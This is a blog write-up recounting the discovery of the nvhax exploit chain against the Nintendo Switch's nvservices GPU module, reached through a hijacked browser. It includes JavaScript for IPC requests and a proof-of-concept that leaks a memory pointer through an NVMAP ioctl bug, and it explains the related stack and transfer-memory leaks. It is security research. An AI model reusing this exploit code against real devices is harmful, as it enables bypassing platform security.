Friday, December 28, 2018

The Switch - A Memoir

Welcome to a new write-up! Almost a year later after my last one on the Wii U...

Now, as we are getting close to the dawn of a new year, I will finally present one of the most fun exploit chains I ever had the privilege to discover and develop.
As you know, the Switch has seen many developments on the hacking front since its release and I'm proud to have taken part in a large number of them alongside SciresM, plutoo, derrek, naehrwert, yellows8, TuxSH, fincs, WinterMute and many others.
But before we reached the comfortable plateau we are in now, there were many complex attempts to defeat the Switch's security and today we will be looking into one of the earliest successful attempts to exploit the system from a bottom-up approach: the nvhax exploit.

To fully understand the context of this write-up we must go back to April 2017, a mere month after the Switch's international release.
Back then, everybody was trying to push the limits of the not-so-secret Internet Browser that came bundled with the Switch's OS. You may recall that this browser was vulnerable to a public and very popular bug known as CVE-2016-4657, notorious for being part of the Pegasus exploit chain. This allowed us to take over the browser's process with minimal effort in less than a week of the Switch's release.
The next logical step would be to escalate outside the browser's sandbox and attempt to exploit other, more privileged, parts of the system and this is how our story begins...

Introduction


Exploiting the browser became a very pleasant task after the release of PegaSwitch (https://github.com/reswitched/pegaswitch), a JS based toolkit that leverages vulnerabilities in the Switch's browser to achieve complex ROP chains.
Shortly after dumping the browser's binary from memory, documentation on the IPC system began to take form on the SwitchBrew wiki (https://switchbrew.org/wiki/Main_Page).
Before the generic IPC marshalling system now implemented in PegaSwitch, plenty of us began writing our own ways of talking with the Switch. One such example is in rop-rpc (https://github.com/xyzz/rop-rpc), another toolkit designed for running ROP chains on the Switch's browser.

I decided to write my own functions on top of the very first release of PegaSwitch as you can see below (please note that this is severely outdated):

sploitcore.prototype.send_request = function(srv_handle, type, domain_id, cmd_id, params, dump_reply, show_log) {
var req_buf = this.malloc(0x1000);
if (show_log)
utils.log('Request buf: ' + utils.paddr(req_buf));
var request_reply = [0, 0];
var err_code = [0, 0];
// One handle and 2 words input type
if (type == 0)
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x80000010, req_buf, 0x04/4); // Write num_words
// Write handle descriptor
this.write4(0x00000002, req_buf, 0x08/4); // Write handle_copy_num
this.write4(params[0], req_buf, 0x0C/4); // Write handle_copy
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[1], req_buf, 0x20/4);
}
else if (type == 1) // One word input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000009, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write4(params[0], req_buf, 0x20/4);
}
else if (type == 2) // Descriptor B and one word input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 0;
var buf_desc_b = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x01000004, req_buf, 0x00/4); // Write type
this.write4(0x0000000C, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_b, req_buf, 0x10/4); // Write buf_desc_b
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x30/4);
this.write8(params[3], req_buf, 0x38/4);
}
else if (type == 3) // Descriptor A and one word input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 0;
var buf_desc_a = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x00100004, req_buf, 0x00/4); // Write type
this.write4(0x0000000C, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_a, req_buf, 0x10/4); // Write buf_desc_a
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write4(params[2], req_buf, 0x30/4);
}
else if (type == 4) // Current PID, domain descriptor and one word input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x8000000E, req_buf, 0x04/4); // Write num_words
// Write handle descriptor
this.write4(0x00000001, req_buf, 0x08/4); // Write handle_copy_num
this.write4(0x00000000, req_buf, 0x0C/4); // Write PID_lo
this.write4(0x00000000, req_buf, 0x10/4); // Write PID_hi
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write domain descriptor
this.write4(0x00180001, req_buf, 0x20/4); // Write extra_size
this.write4(domain_id, req_buf, 0x24/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
this.write4(0x49434653, req_buf, 0x30/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x34/4); // Write padding
this.write4(cmd_id, req_buf, 0x38/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x40/4);
}
else if (type == 5) // Domain descriptor and 6 words input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000012, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
// Write domain descriptor
this.write4(0x00280001, req_buf, 0x10/4); // Write extra_size
this.write4(domain_id, req_buf, 0x14/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x30/4);
this.write8(params[1], req_buf, 0x38/4);
this.write8(params[2], req_buf, 0x40/4);
}
else if (type == 6) // Descriptor B (flag 0x01), domain descriptor and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 1;
var buf_desc_b = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x01000004, req_buf, 0x00/4); // Write type
this.write4(0x00000016, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_b, req_buf, 0x10/4); // Write buf_desc_b
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write domain descriptor
this.write4(0x00280001, req_buf, 0x20/4); // Write extra_size
this.write4(domain_id, req_buf, 0x24/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
this.write4(0x49434653, req_buf, 0x30/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x34/4); // Write padding
this.write4(cmd_id, req_buf, 0x38/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x40/4);
this.write8(params[3], req_buf, 0x48/4);
this.write8(params[4], req_buf, 0x50/4);
}
else if (type == 7) // Descriptor B (flag 0x01) and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_flags = 1;
var buf_desc_b = (((buf_addr[1] & 0xF) << 0x1C) | ((buf_size[1] & 0xF) << 0x18) | ((buf_addr[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x01000004, req_buf, 0x00/4); // Write type
this.write4(0x00000012, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_b, req_buf, 0x10/4); // Write buf_desc_b
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x30/4);
this.write8(params[3], req_buf, 0x38/4);
this.write8(params[4], req_buf, 0x40/4);
}
else if (type == 8) // Descriptor X and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_counter = 0x01;
var buf_desc_x = (((buf_size[0] & 0xFFFF) << 0x10) | ((buf_addr[1] & 0xF) << 0x0C) | (buf_counter & 0xE00) | ((buf_addr[1] & 0x70) << 0x02) | (buf_counter & 0x3F)) >>> 0;
// Build request
this.write4(0x00010004, req_buf, 0x00/4); // Write type
this.write4(0x0000000D, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_desc_x, req_buf, 0x08/4); // Write buf_desc_x
this.write4(buf_addr[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x20/4);
this.write8(params[3], req_buf, 0x28/4);
this.write8(params[4], req_buf, 0x30/4);
}
else if (type == 9) // Query type
{
// Build request
this.write4(0x00000005, req_buf, 0x00/4); // Write type
this.write4(0x0000000A, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x20/4);
}
else if (type == 10) // 6 words input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x0000000E, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x20/4);
this.write8(params[1], req_buf, 0x28/4);
this.write8(params[2], req_buf, 0x30/4);
}
else if (type == 11) // Descriptor C and 2 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_desc_c = (((buf_size[0] & 0xFFFF) << 0x10) | (buf_addr[1] & 0xFF)) >>> 0;
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000C0A, req_buf, 0x04/4); // Write num_words and flags_desc_c
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x20/4);
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write descriptors
this.write4(buf_addr[0], req_buf, 0x30/4); // Write buf_addr_lo
this.write4(buf_desc_c, req_buf, 0x34/4); // Write buf_desc_c
}
else if (type == 12) // Descriptor C and 6 words input type
{
var buf_addr = params[0];
var buf_size = params[1];
var buf_desc_c = (((buf_size[0] & 0xFFFF) << 0x10) | (buf_addr[1] & 0xFF)) >>> 0;
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000C0E, req_buf, 0x04/4); // Write num_words and flags_desc_c
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
this.write4(0x49434653, req_buf, 0x10/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x14/4); // Write padding
this.write4(cmd_id, req_buf, 0x18/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write params
this.write8(params[2], req_buf, 0x20/4);
this.write8(params[3], req_buf, 0x28/4);
this.write8(params[4], req_buf, 0x30/4);
this.write4(0x00000000, req_buf, 0x38/4); // Write padding
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write descriptors
this.write4(buf_addr[0], req_buf, 0x40/4); // Write buf_addr_lo
this.write4(buf_desc_c, req_buf, 0x44/4); // Write buf_desc_c
}
else if (type == 13) // Descriptor A (2x) and 5 words input type
{
var buf_addr0 = params[0];
var buf_size0 = params[1];
var buf_addr1 = params[2];
var buf_size1 = params[3];
var buf_flags = 0;
var buf_desc_a0 = (((buf_addr0[1] & 0xF) << 0x1C) | ((buf_size0[1] & 0xF) << 0x18) | ((buf_addr0[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
var buf_desc_a1 = (((buf_addr1[1] & 0xF) << 0x1C) | ((buf_size1[1] & 0xF) << 0x18) | ((buf_addr1[1] & 0x70) >> 0x02) | (buf_flags & 0x03)) >>> 0;
// Build request
this.write4(0x00200004, req_buf, 0x00/4); // Write type
this.write4(0x00000012, req_buf, 0x04/4); // Write num_words
// Write descriptors
this.write4(buf_size0[0], req_buf, 0x08/4); // Write buf_size_lo
this.write4(buf_addr0[0], req_buf, 0x0C/4); // Write buf_addr_lo
this.write4(buf_desc_a0, req_buf, 0x10/4); // Write buf_desc_a
this.write4(buf_size1[0], req_buf, 0x14/4); // Write buf_size_lo
this.write4(buf_addr1[0], req_buf, 0x18/4); // Write buf_addr_lo
this.write4(buf_desc_a1, req_buf, 0x1C/4); // Write buf_desc_a
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[4], req_buf, 0x30/4);
this.write8(params[5], req_buf, 0x38/4);
this.write8(params[6], req_buf, 0x40/4);
this.write8(params[7], req_buf, 0x48/4);
this.write8(params[8], req_buf, 0x50/4);
}
else if (type == 14) // Current PID, one handle, domain descriptor and one word input type
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x80000010, req_buf, 0x04/4); // Write num_words
// Write handle descriptor
this.write4(0x00000003, req_buf, 0x08/4); // Write handle_copy_num
this.write4(0x00000000, req_buf, 0x0C/4); // Write PID_lo
this.write4(0x00000000, req_buf, 0x10/4); // Write PID_hi
this.write4(params[0], req_buf, 0x14/4); // Write handle_copy
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
// Write domain descriptor
this.write4(0x00180001, req_buf, 0x20/4); // Write extra_size
this.write4(domain_id, req_buf, 0x24/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x28/4); // Write padding
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
this.write4(0x49434653, req_buf, 0x30/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x34/4); // Write padding
this.write4(cmd_id, req_buf, 0x38/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x3C/4); // Write padding
// Write params
this.write8(params[1], req_buf, 0x40/4);
}
else if (type == 15) // Domain close descriptor
{
// Build request
this.write4(0x00000004, req_buf, 0x00/4); // Write type
this.write4(0x00000010, req_buf, 0x04/4); // Write num_words
this.write4(0x00000000, req_buf, 0x08/4); // Write padding
this.write4(0x00000000, req_buf, 0x0C/4); // Write padding
// Write domain descriptor
this.write4(0x00180002, req_buf, 0x10/4); // Write extra_size
this.write4(domain_id, req_buf, 0x14/4); // Write domain_id
this.write4(0x00000000, req_buf, 0x18/4); // Write padding
this.write4(0x00000000, req_buf, 0x1C/4); // Write padding
this.write4(0x49434653, req_buf, 0x20/4); // Write SFCI
this.write4(0x00000000, req_buf, 0x24/4); // Write padding
this.write4(cmd_id, req_buf, 0x28/4); // Write cmd_id
this.write4(0x00000000, req_buf, 0x2C/4); // Write padding
// Write params
this.write8(params[0], req_buf, 0x30/4);
}
// Call svcSendSyncRequestByBuf
var request_res = this.svc(0x22, [req_buf, [0x1000, 0x00], [srv_handle, 0x00]], false);
if (show_log)
utils.log('svcSendSyncRequestByBuf: result == 0x' + request_res[0].toString(16));
// Request was accepted
if (request_res[0] == 0)
{
// Read service error code
if ((type == 4) || (type == 5) || (type == 6))
err_code[0] = this.read4(req_buf, 0x28/0x04);
else
err_code[0] = this.read4(req_buf, 0x18/0x04);
if (show_log)
utils.log('Got error code: 0x' + err_code[0].toString(16));
// Read back the reply on success
if (err_code[0] == 0)
{
// Take extra domain header into account
if (domain_id)
request_reply = this.read8(req_buf, 0x30/0x04);
else
request_reply = this.read8(req_buf, 0x20/0x04);
}
// Read the number of words in the reply
var num_reply_words = this.read4(req_buf, 0x04/0x04);
// Check for a reply handle
if (num_reply_words & 0x80000000)
{
var num_reply_handles = this.read4(req_buf, 0x08/0x04);
if (num_reply_handles == 0x20)
{
var reply_service_handle = this.read4(req_buf, 0x0C/0x04);
if (show_log)
utils.log('Got reply service handle: 0x' + reply_service_handle.toString(16));
// Return the handle in the reply
request_reply[0] = reply_service_handle;
}
else if (num_reply_handles == 0x22)
{
var reply_event_handle = this.read4(req_buf, 0x0C/0x04);
var reply_service_handle = this.read4(req_buf, 0x10/0x04);
if (show_log)
{
utils.log('Got reply event handle: 0x' + reply_event_handle.toString(16));
utils.log('Got reply service handle: 0x' + reply_service_handle.toString(16));
}
}
else
{
var reply_unk_handle = this.read4(req_buf, 0x0C/0x04);
if (show_log)
utils.log('Got reply unknown handle: 0x' + reply_unk_handle.toString(16));
}
}
// Dump reply if necessary
if (dump_reply)
this.memdump(req_buf, 0x1000, "memdumps/srv_reply.bin");
}
else if (request_res[0] == 0xF601)
{
// Close the handle
var close_res = this.svc(0x16, [srv_handle], false);
if (show_log)
utils.log('svcCloseHandle: result == 0x' + close_res[0].toString(16));
}
this.free(req_buf);
return [request_res, err_code, request_reply];
}
Using this and the "bridge" system (PegaSwitch's way of calling arbitrary functions within the browser's memory space) I could now talk with other services accessible to the browser.
Since this was before smhax was discovered, I didn't know I could just bypass the restrictions imposed by the browser's NPDM so I focused exclusively on the services that the browser itself would normally use.
From these, nvservices immediately caught my attention due to the large amount of symbols left inside the browser's binary which, in turn, made black box analysis of the nvservices system module much easier. This also allowed me to document everything on the SwitchBrew wiki fairly quickly (see https://switchbrew.org/wiki/NV_services).

The nvservices system module provides a high level interface for the GPU (and a few other engines), abstracting away all the low level stuff that a regular application doesn't need to bother with. Its most important part is the nvdrv service family which, as the name implies, provide a communication channel for the NVIDIA drivers inside the nvservices system module.
You can easily see the parallelism with the L4T's (Linux for Tegra) source code but, for obvious reasons, in the Switch's OS the graphics drivers are isolated in a system module instead of being implemented in the kernel.

So, with a combination of reverse engineering and studying Tegra's source code I could steadily document the nvdrv command interface and, more importantly, how to reach the ioctl system that the driver revolves around. There are many ioctl commands for each device interface so this sounded like the perfect attack surface for exploiting nvservices.
Over several weeks I did nothing but fuzz as much ioctl commands as I could reach and, eventually, I found the bugs that would form the core of what would become the nvhax exploit.

The Bug(s)


The very first bug I found was in the /dev/nvmap device interface. This interface's purpose is to provide a way for creating and managing memory containers that serve as backing memory for many other parts of the GPU system.

From the browser's perspective, accessing this device interface consists in the following steps:
  • Open a service session with nvdrv:a (a variation of nvdrv, available only to applets such as the browser).
  • Call the IPC command Initialize which supplies memory allocated by the browser to the nvservices system module.
  • Call the IPC command Open on the /dev/nvmap interface.
  • Submit ioctl commands by using the IPC command Ioctl.
  • Close the interface with the IPC command Close.
Since we are hijacking the browser mid-execution, a service session with nvdrv:a is already created and the Initialize IPC command has already been invoked. After finding the service handle for this session we can simply send Open and Ioctl commands to any interface we like.
In this case, while messing around with the /dev/nvmap interface I found a bug in the NVMAP_IOC_FREE ioctl command that would leak back a memory pointer from the nvservices memory space:

sploitcore.prototype.nvdrv_sharedmem_leak = function(nvdrv_buf, dev_handle) {
var temp_buf = this.malloc(0x1000);
var nvdrv_ioctl = this.bridge(0x1A247C, types.int, types.void_p, types.int, types.int, types.void_p, types.void_p, types.void_p);
// Setup buffers
var in_buf_ioctl = utils.add2(temp_buf, 0x000);
var out_buf_ioctl = utils.add2(temp_buf, 0x100);
var out_buf_status = utils.add2(temp_buf, 0x200);
var in_buf = utils.add2(temp_buf, 0x800);
var out_buf = utils.add2(temp_buf, 0x900);
var ioctl_num = 0;
// Prepare in/out buffers
this.write8(in_buf, in_buf_ioctl, 0x00/4); // Write the input buffer's address
this.write4(0x00000100, in_buf_ioctl, 0x08/4); // Write the input buffer's size
this.write8(out_buf, out_buf_ioctl, 0x00/4); // Write the output buffer's address
this.write4(0x00000100, out_buf_ioctl, 0x08/4); // Write the output buffer's size
// Setup the creation params
this.write4(0x00010000, in_buf, 0x00/4);
// Call NVMAP_IOC_CREATE
ioctl_num = 0xC0080101;
var ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
var ioctl_status = this.read4(out_buf_status);
// Read back handle
var nvmap_handle = this.read4(out_buf, 0x04/4);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_CREATE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_handle == 0x" + nvmap_handle.toString(16));
// Setup the allocation params
this.write4(nvmap_handle, in_buf, 0x00/4); // handle
this.write4(0x00000000, in_buf, 0x04/4); // heap mask
this.write4(0x00000001, in_buf, 0x08/4); // flags
this.write4(0x00001000, in_buf, 0x0C/4); // align
this.write4(0x00000000, in_buf, 0x10/4); // kind
this.write4(0x00000000, in_buf, 0x14/4); // padding
this.write4(0x00000000, in_buf, 0x18/4); // mem_addr_lo
this.write4(0x00000000, in_buf, 0x1C/4); // mem_addr_hi
// Call NVMAP_IOC_ALLOC
ioctl_num = 0xC0200104;
ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
ioctl_status = this.read4(out_buf_status);
// Read back result
var nvmap_alloc_res = this.read4(out_buf);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_ALLOC): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_alloc_res == 0x" + nvmap_alloc_res.toString(16));
// Setup the free params
this.write4(nvmap_handle, in_buf, 0x00/4); // handle
this.write4(0x00000000, in_buf, 0x04/4); // flags
this.write4(0x00000000, in_buf, 0x08/4); // mem_addr_lo
this.write4(0x00000000, in_buf, 0x0C/4); // mem_addr_hi
this.write4(0x00000000, in_buf, 0x10/4); // mem_size
this.write4(0x00000000, in_buf, 0x14/4); // mem_is_cached
// Call NVMAP_IOC_FREE
ioctl_num = 0xC0180105;
ioctl_res = nvdrv_ioctl(nvdrv_buf, dev_handle, ioctl_num, in_buf_ioctl, out_buf_ioctl, out_buf_status);
// Read status
ioctl_status = this.read4(out_buf_status);
// Read back result
var nvmap_free_res = this.read4(out_buf);
if (this.nvdrv_show_log)
utils.log('nvdrv_ioctl (NVMAP_IOC_FREE): result == 0x' + ioctl_res[0].toString(16) + ", status == 0x" + ioctl_status.toString(16) + ", nvmap_free_res == 0x" + nvmap_free_res.toString(16));
// Read back the leaked pointer
var leak_ptr = this.read8(out_buf, 0x08/4);
utils.log('Leaked ptr: ' + utils.paddr(leak_ptr));
this.free(temp_buf);
return leak_ptr;
}
I later found out that a few others had also stumbled upon this bug, so I stashed it away for a while.

A few days later I was messing around with the /dev/nvhost-ctrl-gpu interface and got a weird crash in one if its ioctl commands: NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE.
Reverse engineering the browser's code revealed that this ioctl was indeed present, but no code path could be taken to call it under normal circumstances. Furthermore, I was able to observe that this particular ioctl command would only take a struct with a single u64 as its argument.
After finding it in the Tegra's source code (see https://github.com/arter97/android_kernel_nvidia_shieldtablet/blob/master/include/uapi/linux/nvgpu.h#L315) I was able to deduce that it was expecting a nvgpu_gpu_wait_pause_args struct which contains a single field: an u64 pwarpstate.
Turns out, pwarpstate is a pointer to a warpstate struct which contains 3 u64 fields: valid_warps, trapped_warps and paused_warps.

Without going into much detail on how the GM20B (Tegra X1's GPU) works:
  • The GM20B has 1 GPC (Graphics Processing Cluster). 
  • Each GPC has 2 TPCs (Texture Processing Clusters or Thread Processing Clusters, depending on context). 
  • Each TPC has 2 SMs (Streaming Multiprocessors) and each contains 8 processor cores.
  • Each SM can run up to 128 "warps".
  • A "warp" is a group of 32 parallel threads that runs inside a SM.
So, basically, this ioctl signals the GPC to pause and tries to return information on the "warps" running on each SM inside TPC0 (TPC1 is ignored).
You can find it in Tegra's source code here: https://github.com/arter97/android_kernel_nvidia_shieldtablet/blob/master/drivers/gpu/nvgpu/gk20a/ctrl_gk20a.c#L398

As you can see, it builds a warpstate struct with the information and calls copy_to_user using pwarpstate as the destination address.
Since dealing directly with memory pointers from other processes is incompatible with the Switch's OS design, most ioctl commands were modified to take "in-line" arguments instead. However, NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE was somehow forgotten and kept the original memory pointer based approach.

What this means in practice is that we now have an ioctl command that is trying to copy data directly using a memory pointer provided by the browser! However, since any pointer we pass from the browser is only valid to the browser's memory space, we need to leak memory from the nvservices system module to turn this into something even remotely useful.
Upon realizing this, I recalled the other bug I had found and tried to pass the pointer it leaked to NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE. As expected, I no longer had a crash, instead the command completed successfully!

Unfortunately, NVMAP_IOC_FREE leaks a pointer to a memory container allocated by nvservices using transfer memory. This means that, while the leaked address is valid in nvservices's memory space, it is impossible to find out where the actual system module's sections are located because transfer memory is also subjected to ASLR.

At this point, I decided to share the bug with plutoo and we began discussing potential ways to use it for further exploitation.

As I mentioned before, every time a session is initiated with the nvdrv service family, the client must call the IPC command Initialize and this command requires the client to allocate and submit a kind of memory container that the Switch calls Transfer Memory.
Transfer memory is allocated with the SVC 0x15 (svcCreateTransferMemory) which returns a handle that the client process can send over to other processes which in turn can use it to map that memory in their own memory space. When this is done, the memory range that backs up the transfer memory becomes inaccessible to the client process until the other process releases it.

A few days pass and plutoo has an idea: what if you destroy the service session with nvdrv:a and dump the memory range that backs the transfer memory sent over with the Initialize command?
And that's how the Transfer Memory leak or transfermeme bug was found. You can find a more detailed write-up on this bug from daeken, who also found the same bug independently, here: https://daeken.svbtle.com/nintendo-switch-nvservices-info-leak

With this new memory leak in hand I tried to blindly pass some pointers to NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and got mixed results (crashes, device interfaces not working anymore, etc.). But when I tried to pass the pointer leaked by NVMAP_IOC_FREE and dump the transfer memory afterwards, I could see that some data had changed.
As it turns out, the pointer leaked by NVMAP_IOC_FREE belongs to the transfer memory region and we can now use this to find out exactly what is being written by NVGPU_GPU_IOCTL_WAIT_FOR_PAUSE and where.
As expected, a total of 48 bytes were being written which, if you recall, make up the total space used by 2 warpstate structs (one for each SM). However, to my surprise, the contents had nothing to do with the "warps" and they kept changing on subsequent calls.
That's right, the warpstate structs were not initialized on the nvservices' side so now we have a 48 byte stack leak as well!
While this may sound convenient, it ended up being a massive pain in the ass due to how unstable the stack contents could be. But, of course, when there's a will there's a way...

The Exploit


Exploiting these bugs was very tricky...
